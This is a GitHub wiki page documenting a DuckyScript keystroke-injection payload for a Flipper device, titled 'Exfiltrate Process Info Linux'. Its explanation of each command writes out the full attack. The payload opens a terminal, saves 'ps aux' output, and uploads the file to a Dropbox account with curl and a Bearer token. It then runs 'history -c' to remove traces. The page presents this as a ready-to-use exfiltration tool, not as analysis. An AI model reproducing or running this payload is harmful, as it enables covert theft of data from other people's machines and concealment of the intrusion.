Exfiltrate Process Info Linux - aleff-github/my-flipper-shits GitHub Wiki

Documentation

This page documents DuckyScript code that exfiltrates process information from a Linux machine using a Dropbox Webhook. The code was written by Aleff and is at version 1.0. It is meant to be run on a Linux machine and requires an internet connection as well as a Dropbox access token.

Script Information

  • Title: Exfiltrate Process Info
  • Author: Aleff
  • Version: 1.0
  • Category: Exfiltration
  • Target: Linux

Requirements

  • Internet Connection
  • Dropbox Webhook

Code Explanation

Delay Commands

  • DELAY 1000: Delays the execution of the next command by 1 second.
  • DELAY 2000: Delays the execution of the next command by 2 seconds.
  • DELAY 500: Delays the execution of the next command by 500 milliseconds.

Keyboard Commands

  • CTRL-ALT t: Presses the CTRL, ALT, and t keys together.

String Commands

  • STRING ps aux > process.txt: Types the ps aux > process.txt command into the Linux terminal, which outputs the process information into a file named process.txt.
  • STRING ACCESS_TOKEN=": Types the ACCESS_TOKEN=" string into the terminal.
  • STRING TOKEN: Types the TOKEN value into the terminal.
  • STRING ": Types the closing " character into the terminal.
  • STRING USER_NAME=$(whoami): Types the USER_NAME=$(whoami) command into the terminal, which retrieves the username of the current user.
  • STRING TXT_PATH="/home/$USER_NAME/process.txt": Types the TXT_PATH="/home/$USER_NAME/process.txt" command into the terminal, which sets the path of the process.txt file.
  • STRING DROPBOX_FOLDER="/: Types the DROPBOX_FOLDER="/ string into the terminal.
  • STRING DROPBOX_FOLDER_NAME: Types the DROPBOX_FOLDER_NAME value into the terminal.
  • STRING ": Types the closing " character into the terminal.
  • STRING curl -X POST: Types the start of the curl -X POST command into the terminal; once the following STRING lines complete it, the command sends a POST request to the Dropbox API.
  • STRING DROPBOX_API_CONST: Types the DROPBOX_API_CONST value into the terminal, which is the API endpoint for uploading files to Dropbox.
  • STRING --header "Authorization: Bearer $ACCESS_TOKEN": Types the --header "Authorization: Bearer $ACCESS_TOKEN" string into the terminal, which specifies the access token for Dropbox API authentication.
  • STRING --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}": Types the --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" string into the terminal, which specifies the Dropbox folder and upload options.
  • STRING --header "Content-Type: application/octet-stream": Types the --header "Content-Type: application/octet-stream" string into the terminal, which specifies the content type of the uploaded file.
  • STRING --data-binary "@$TXT_PATH": Types the --data-binary "@$TXT_PATH" string into the terminal, which specifies the path of the file to be uploaded.

Define Commands

  • DEFINE TOKEN example: Sets the TOKEN value to example.
  • DEFINE DROPBOX_FOLDER_NAME example: Sets the DROPBOX_FOLDER_NAME value to example.

Remove Traces Commands

  • STRING history -c: Types the history -c command into the terminal, which clears the command history.
  • STRING exit: Types the exit command into the terminal, which exits the terminal session.